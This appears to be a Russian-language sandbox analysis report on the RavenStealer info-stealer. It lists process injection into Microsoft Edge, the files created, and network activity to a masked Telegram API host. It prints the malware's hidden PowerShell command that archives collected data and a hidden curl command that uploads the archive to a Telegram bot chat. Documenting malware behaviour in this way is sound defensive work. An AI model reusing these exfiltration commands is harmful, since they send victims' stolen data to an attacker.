Техническая информация
Вредоносные функции
Внедряет код в
следующие системные процессы:
- %WINDIR%\systemapps\microsoft.microsoftedge_8wekyb3d8bbwe\microsoftedge.exe
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\ravenstealer\screenshot.png
- %TEMP%\user_ravenstealer.zip
- nul
Сетевая активность
Подключается к
- 'ap#.##legram.org':443
TCP
Запросы HTTP GET
- http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?e5##############
Другие
- 'ap#.##legram.org':443
UDP
- DNS ASK ap#.##legram.org
Другое
Ищет следующие окна
- ClassName: 'OleMainThreadWndClass' WindowName: ''
Запускает на исполнение
- '%WINDIR%\systemapps\microsoft.microsoftedge_8wekyb3d8bbwe\microsoftedge.exe' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "try { Compress-Archive -Path '%LOCALAPPDATA%\RavenStealer\*' -DestinationPath '%TEMP%\user_RavenStealer.zip' -Force -ErrorAction SilentlyCo... (со скрытым окном)
- '<SYSTEM32>\curl.exe' -s -o nul -F "chat_id=8020870339" -F "document=@%TEMP%\user_RavenStealer.zip" -F "caption=RavenStealer Report for user@Windows 8\n\nNo significant data found on this system." https://api.telegr... (со скрытым окном)
